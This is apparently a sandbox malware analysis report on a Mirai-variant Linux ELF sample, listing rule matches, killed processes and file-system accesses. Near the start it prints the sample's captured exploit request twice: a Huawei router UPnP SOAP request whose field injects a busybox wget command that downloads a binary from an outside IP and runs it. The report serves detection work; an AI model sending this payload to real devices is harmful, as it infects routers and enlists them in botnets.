              Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: t9lNEiD3ui.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: t9lNEiD3ui.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

              System Summary

              barindex
              Source: t9lNEiD3ui.elf, type: SAMPLEMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: t9lNEiD3ui.elf, type: SAMPLEMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 6203.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: 6203.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 6212.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: 6212.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 6207.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: 6207.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 6209.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: 6209.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: 6208.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF Mirai variant Author: Florian Roth
              Source: 6208.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: Detects ELF malware Mirai related Author: Florian Roth
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 2018, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 2077, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 2078, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 2079, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 2080, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 2083, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 2084, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 2156, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6208, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6209, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6212, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6221, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6222, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6224, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6225, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6226, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6227, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6243, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6253, result: successfulJump to behavior
              Source: xfce4-panel.xml.new.33.drOLE indicator, VBA macros: true
              Source: xfce4-panel.xml.new.33.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
              Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 2018, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 2077, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 2078, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 2079, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 2080, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 2083, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 2084, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 2156, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6208, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6209, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6212, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6221, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6222, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6224, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6225, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6226, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6227, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6243, result: successfulJump to behavior
              Source: /tmp/t9lNEiD3ui.elf (PID: 6215)SIGKILL sent: pid: 6253, result: successfulJump to behavior
              Source: t9lNEiD3ui.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: t9lNEiD3ui.elf, type: SAMPLEMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 6203.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: 6203.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 6212.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: 6212.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 6207.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: 6207.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 6209.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: 6209.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: 6208.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
              Source: 6208.1.00007fae84400000.00007fae84412000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: classification engineClassification label: mal100.spre.troj.linELF@0/1@67/0
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6221)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6222)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6224)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6225)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/local/share/fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /home/saturnino/.local/share/fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /home/saturnino/.fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/X11/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/cMap/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/cmap/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/opentype/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/type1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/X11/Type1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/X11/encodings/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/X11/misc/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/X11/util/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/cmap/adobe-cns1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/cmap/adobe-gb1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/cmap/adobe-japan1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/cmap/adobe-japan2/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/cmap/adobe-korea1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/opentype/malayalam/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/opentype/mathjax/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/opentype/noto/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/opentype/urw-base35/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/Gargi/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/Gubbi/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/Nakula/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/Navilu/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/Sahadeva/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/Sarai/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/abyssinica/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/ancient-scripts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/dejavu/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/droid/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/fonts-beng-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/fonts-deva-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/fonts-gujr-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/fonts-guru-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/fonts-kalapi/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/fonts-orya-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/fonts-telu-extra/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/fonts-yrsa-rasa/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/freefont/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/kacst/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/kacst-one/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/lao/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/lato/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/liberation/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/liberation2/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/lohit-assamese/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/lohit-bengali/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/lohit-devanagari/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/lohit-gujarati/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/lohit-kannada/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/lohit-malayalam/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/lohit-oriya/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/lohit-punjabi/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/lohit-tamil/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/lohit-tamil-classical/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/lohit-telugu/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/malayalam/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/noto/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/openoffice/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/padauk/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/pagul/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/samyak/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/samyak-fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/sinhala/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/tibetan-machine/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/tlwg/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/ttf-khmeros-core/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/truetype/ubuntu/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/type1/urw-base35/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /usr/share/fonts/X11/encodings/large/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /home/saturnino/.cacheJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /home/saturnino/.localJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6226)Directory: /home/saturnino/.configJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6227)Directory: /home/saturnino/.Xdefaults-galassiaJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6227)Directory: /usr/share/fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6227)Directory: /usr/local/share/fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6227)Directory: /home/saturnino/.local/share/fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6227)Directory: /home/saturnino/.fonts/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6227)Directory: /usr/share/fonts/X11/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6227)Directory: /usr/share/fonts/cMap/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6227)Directory: /usr/share/fonts/cmap/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6227)Directory: /usr/share/fonts/opentype/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6227)Directory: /usr/share/fonts/truetype/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6227)Directory: /usr/share/fonts/type1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6227)Directory: /usr/share/fonts/X11/Type1/.uuidJump to behavior
              Source: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 (PID: 6227)Directory: /usr/share/fonts/X11/encodings/.uuidJump to behavior
